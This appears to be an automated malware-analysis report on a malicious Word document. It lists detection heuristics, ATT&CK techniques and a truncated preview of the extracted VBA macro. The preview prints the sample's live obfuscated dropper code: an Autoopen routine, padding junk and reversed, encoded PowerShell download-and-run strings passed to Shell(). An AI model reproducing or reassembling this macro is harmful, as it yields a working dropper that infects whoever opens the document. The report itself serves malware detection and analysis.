MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing a VBA macro. The macro includes an AutoOpen subroutine and a critical heuristic firing for a Shell() call, indicating it is designed to execute arbitrary commands. This functionality is commonly used to download and execute further malicious payloads.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6545729-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6545729-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 146118 bytes |
SHA-256: 37c705f4f83ae40e2fecdb6fb3fdd83c0aad662a7f3fdb3eaac037ab7b91d050 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IbbPPaQajtorB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RFwDnl(iBvCmV)
wKKFzw = Wrrla
siQQSd = Kcmaw + CDbl(35320 - XHVEGf - UDzwz + CDbl(27869)) - 16094 - CDbl(89526)
FRNvE = kikIC
VYkHfE = 88316
End Sub
Sub Wmfud(bQRUO)
QOhIk = nUWqU
dawfPr = JOfrS + CDbl(73741 - SjbUM - uqXGq + CDbl(53410)) - 42960 - CDbl(15770)
ZsfRi = DZvBa
EzkXO = 42932
EGtCi = DmDso
VKspnL = EBPHf + CDbl(37122 - Nptmib - EDKfp + CDbl(2113)) - 24669 - CDbl(59972)
zjGNEr = HzLOS
pzNjr = 83759
sQJNh = GhJzK
YWPaYF = VcmoXN + CDbl(75497 - NLSGJV - ljXtf + CDbl(77154)) - 70898 - CDbl(60269)
ABatta = odKVl
cmAuc = 87203
End Sub
Sub qqBSH(jCfZtk)
nnWmuu = nidwzj
GltlLr = HKzHl + CDbl(17079 - VJDRkn - oQNAi + CDbl(12285)) - 65737 - CDbl(24174)
CTbFZ = mohtn
dWiIls = 34113
ZhOsM = Ufkcl
uzwoKD = DWPjr + CDbl(565 - LtiswN - rnUEi + CDbl(86919)) - 14371 - CDbl(93755)
EEILl = ZqziXN
KwWsZG = 52639
End Sub
Sub Autoopen()
On Error Resume Next
rjXLDK = kcKNHQ
ijoBf = suOqC + CDbl(86895 - WhpTAV - MYkAh + CDbl(40684)) - 96015 - CDbl(11350)
YJGiz = nDYbH
wRjIK = 64821
irvLtcKpPFUon (CmqMl + vmBPTlpThWqUG + wFwnT)
VmZqj = LdBumv
NFPHE = XnsDih + CDbl(94519 - bBPpP - QlRXb + CDbl(438)) - 25067 - CDbl(98408)
EIAvn = Biwuw
XdjrJj = 50951
End Sub
Sub bmEWqJ(nsjEiY)
ovilKz = SRvTJt
ijRQm = dRDiF + CDbl(57140 - NqSqRX - poIXZd + CDbl(18083)) - 17106 - CDbl(40444)
ChPUF = OnsIF
rEjjB = 24547
zEClFS = XurJGU
tbYNbI = DCYOiT + CDbl(93599 - rsbwj - EzvKB + CDbl(22008)) - 78594 - CDbl(37699)
iClZwc = SaEwv
dWWwz = 37544
whJna = bdCZwo
HqLwuw = jaBrha + CDbl(5777 - YoCOV - wBtzw + CDbl(18345)) - 1353 - CDbl(59191)
AIJKu = KZEwsU
jRGAl = 11236
End Sub
Sub OXiTU(oSzvp)
EKBjXP = iNOzP
vYUbrw = uaBcZ + CDbl(81426 - kwsaIJ - POihi + CDbl(69620)) - 56081 - CDbl(44672)
zZTqYm = rHzRf
JYKhZY = 69213
End Sub
Attribute VB_Name = "opFLjKqtJN"
Sub XjBDGz(ziBSK)
llEGXB = EnVLk
ircdz = kWIuHV + CDbl(7128 - HaFUVi - ZuFkW + CDbl(15357)) - 5869 - CDbl(80749)
OpTtVa = AEUaW
qwlTTD = 58164
End Sub
Function vmBPTlpThWqUG()
On Error Resume Next
AqGAEz = taqjj
jSBKM = FEQADq + CDbl(93028 - IwCoz - CNzNs + CDbl(31769)) - 56385 - CDbl(96825)
ditqF = ijJHX
dkpCJ = 16131
JNkzfw = XFdRkd
fTXLbk = PlXGIN + CDbl(50859 - ZZhzs - ErAAua + CDbl(38504)) - 84088 - CDbl(23735)
hPwfM = WrONtb
qXkQM = 60459
uCQWofFs = Ipffs("zi.)63]rAHC[]gNiRTs[,)78]rAHC[+611]rAHC[+37]rAHC[((ECAlpEr.)'`','puE'(.rBDMt", 14764 + 7 - 14764, 14764 + 68 - 14764)
kmlvb = WKhJPY
SYtQv = zDqjiA + CDbl(54554 - KdJKHM - UvdBD + CDbl(69327)) - 7400 - CDbl(23139)
FzVCu = dUUOj
tDGvz = 97633
iNtvwM = zofVX
DwadcZ = UwpWj + CDbl(93749 - Biwkd - uAvVk + CDbl(18603)) - 20164 - CDbl(33059)
UIHjPq = QqLMA
mXWOC = 85372
vcCXA = Ipffs("bEUTc[]gNirTS[,)09]RAhc'+'[+211]RAhc[+76]RAhc[((ECALpEr.)Av2}}{hAv2+Av2cAv2+'+'Av'+'2tacAv2+Av2};kaeAv2+Av2rb;)CDSLkAv2+Av2K()Av2+Av2ZpA'+'v'+'2+Av2CmAv2+Av2eAv2+Av2tI-eZpC+ZpAv2+Av2Ck'+'Av2+Av'Xco", 24234 + 4 - 24234, 24234 + 190 - 24234)
PrurH = CDEtT
mYbjP = hddRFY + CDbl(34538 - cOXzV - SzjcO + CDbl(30932)) - 49665 - CDbl(24810)
VLzswN = KrGOUO
zmVZra = 78232
isHlRm = iqNDms
OrtIHF = uDwwzS + CDbl(64555 - tuqiP - srbwm + CDbl(28841)) - 93266 - CDbl(35691)
WWzoca = arQbk
ImUTzP = 93316
OvWNtoMGU = Ipffs("oSkfOAv2+Av2eAv2+Av2lXCtIFAv2+Av2daOAv'+'2+Av2XCtAv2+Av2lnWXCtoDZfOAv2+Av2.UAv2+Av2YYLAv2+Av'+'2kK{yAv2+Av2rtAvijME", 60485 + 5 - 60485, 60485 + 108 - 60485)
MEdfV = SKVqDb
ccwiE = oUzRod + CDbl(6474 - oiSRjW - KSWIHa + CDbl(74547)) - 30565 - CDbl(42309)
XJjjKW = sbHwNm
CSQdfC = 47580
NJdrHj = jJWtv
MuBjM = tVzCnK + CDbl(26111 - aFJSZ - UJPVaj + CDbl(38597)) - 16773 - CDbl(90886)
uOHiHP = fDZuJO
qjuJl = 57653
irorj = Ipffs("iZzcoAv2+Av2-wZpC+ZpAv2+Av2CeZpC+ZpAv2+Av2CnZAv2+Av2pCAv2'+'+Av2(& Av2+Av2=Av2+Av2 dsAv2+Av2adaAv2+Av2snLAv2+Av2kKAv2(( 6h%", 43401 + 4 - 43401, 43401 + 116 -
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.